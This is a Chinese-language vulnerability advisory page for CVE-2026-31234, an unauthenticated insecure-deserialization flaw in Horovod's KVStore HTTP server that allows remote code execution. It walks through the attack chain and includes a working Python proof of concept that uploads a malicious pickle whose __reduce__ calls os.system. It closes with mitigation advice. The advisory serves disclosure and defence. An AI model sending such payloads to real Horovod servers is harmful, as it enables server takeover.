CVE-2026-31234 CVSS 9.8 严重

CVE-2026-31234 Horovod不安全反序列化致RCE漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-31234

漏洞类型

不安全的反序列化

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Horovod

漏洞概述

Horovod在0.28.1及之前版本中存在严重的不安全反序列化漏洞。其KVStore HTTP服务器组件因缺乏身份验证和授权机制，允许攻击者通过HTTP PUT请求写入任意数据。当Horovod工作进程通过HTTP GET请求数据时，会直接使用cloudpickle.loads()反序列化数据且未验证来源。攻击者可利用此缺陷发送恶意pickle载荷，诱导工作进程反序列化并执行任意代码，从而实现远程代码执行。

技术细节

该漏洞源于Horovod的KVStore组件在处理分布式任务协调时，未对HTTP接口实施必要的访问控制。攻击者无需认证即可向服务器发送数据。利用时，攻击者构造包含恶意Python代码的pickle对象，通过HTTP PUT请求将其写入KVStore。当受害的Horovod worker尝试读取该数据时，会调用cloudpickle.loads()进行反序列化。由于pickle机制的不安全性，反序列化过程会自动执行对象中定义的`__reduce__`方法，导致攻击者预设的系统命令在worker进程上下文中被执行。鉴于无需用户交互且网络攻击向量简单，该漏洞极易导致服务器被完全接管。

攻击链分析

STEP 1

步骤1：侦察

攻击者扫描网络，发现开放的Horovod KVStore HTTP服务端口。

STEP 2

步骤2：注入载荷

攻击者构造恶意的Python Pickle反序列化载荷，利用无需认证的漏洞，通过HTTP PUT请求将其发送并存储到KVStore服务器中。

STEP 3

步骤3：触发反序列化

正常的Horovod Worker进程尝试从KVStore读取数据进行任务协调，发起HTTP GET请求获取被污染的数据。

STEP 4

步骤4：执行代码

Worker进程调用cloudpickle.loads()对获取的数据进行反序列化，触发恶意代码执行，攻击者获得服务器控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import pickle
import os
import requests

# Target Horovod KVStore URL
# CVE-2026-31234: KVStore lacks authentication and allows arbitrary writes
target_url = "http://<target-ip>:<port>/kvstore/key"

# Generate malicious payload using pickle
# This class defines the payload to be executed during deserialization
class Exploit:
    def __reduce__(self):
        # Command to execute on the victim worker
        # Example: creating a file or connecting back
        return (os.system, ('touch /tmp/pwned_by_cve_2026_31234',))

# Serialize the payload
malicious_data = pickle.dumps(Exploit())

# Exploit: Send malicious payload via HTTP PUT
# The server accepts this data without authentication
try:
    print(f"[*] Sending exploit payload to {target_url}...")
    response = requests.put(target_url, data=malicious_data)
    
    if response.status_code == 200:
        print("[+] Payload uploaded successfully.")
        print("[*] Triggering deserialization... wait for a worker to call GET.")
    else:
        print(f"[-] Upload failed. Status: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

Horovod <= 0.28.1

防御指南

临时缓解措施

在未升级修复前，建议在防火墙或安全组中阻断外部对KVStore HTTP端口的访问，或配置服务仅监听本地回环地址（127.0.0.1），防止攻击者利用该漏洞进行远程攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表